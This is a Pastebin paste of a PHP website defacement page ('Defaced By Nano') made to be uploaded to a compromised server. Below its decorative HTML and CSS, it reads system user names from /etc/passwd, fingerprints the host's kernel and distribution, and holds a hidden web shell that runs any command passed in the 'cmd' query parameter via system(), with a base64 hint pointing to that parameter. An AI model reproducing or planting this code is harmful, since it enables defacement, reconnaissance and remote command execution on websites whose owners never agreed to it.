N_0x3a

deface page

Sep 16th, 2020
109
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.18 KB | None | 0 0
  1. <title> PWD By Nano</title>
  2.  
  3.  
  4. <div>
  5. </center>
  6. <style>
  7. body{
  8.     background-image: url('https://media1.tenor.com/images/08810a93acbd214eeee56d9dd02f9bbc/tenor.gif?itemid=4777404');
  9.     background-size: cover;
  10.    
  11.    
  12.    
  13.     width:100%;
  14.     height:100%;
  15.     margin:0;
  16. }
  17. </style>
  18.  
  19. <style>
  20. img {
  21.   border-radius: 80%;
  22. }
  23. </style>
  24.  
  25.  
  26. <br><br><b><center><p style="color:lime;font-size:50px;">Defaced By Nano</p></b>
  27. <img src="https://imgur.com/oj8XHiM.gif" alt="AKA Oop" width="300" height="200"></br><br>
  28.  
  29. <br>
  30. <style>
  31. .rainbow {
  32.   background-image: -webkit-gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #22f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  33.   background-image: gradient( linear, left top, right top, color-stop(0, #f22), color-stop(0.15, #f2f), color-stop(0.3, #22f), color-stop(0.45, #2ff), color-stop(0.6, #2f2),color-stop(0.75, #2f2), color-stop(0.9, #ff2), color-stop(1, #f22) );
  34.   color:transparent;
  35.   -webkit-background-clip: text;
  36.   background-clip: text;
  37. }
  38. </style>
  39. <center><b><p style="font-size:20px;color:white;"> Dumps:</p></b><span style="font-size:17px;" class="rainbow">https://pastebin.com/u/N_0x3a</span>
  40. <center><b><p style="font-size:20px;color:white;"> Server:</p></b><center><b><span style="font-size:17px;" class="rainbow">
  41. <?php
  42. echo nl2br("") . php_uname();
  43. ?>
  44. <br><br>
  45. <center><b><p style="font-size:20px;color:white;">Users:</p></b><span style="font-size:17px;" class="rainbow">
  46.  
  47. <?php
  48.    $command = "cat /etc/passwd | cut -d\":\" -f1";
  49. echo exec($command);
  50. ?>
  51. <br><br>
  52. </p></b>
  53. <b><p style="font-size:20px;color:white;">Distro:</p></b>
  54. <span style="font-size:15px;" class="rainbow">
  55. <?php
  56. $cmd = '( lsb_release -ds || cat /etc/*release || uname -om ) 2>/dev/null | head -n1';
  57. exec($cmd, $output);
  58. print_r($output);
  59. ?>
  60. <br><br>
  61. <b><p style="font-size:20px;color:white;">P2NtZD0gbG9va3MgaW50ZXJlc3Rpbmc=</p></b>
  62. <?php
  63. @$foo = system($_GET['cmd']);
  64. error_reporting(0);
  65. if ($foo == 3)
  66. {
  67. echo nl2br("/n");
  68. }
  69. else
  70. {
  71.  
  72.  
  73. }
  74. ?>
  75. <script>document.getElementById("cmd").focus();</script>
  76. <br><br></span>
Add Comment
Please, Sign In to add comment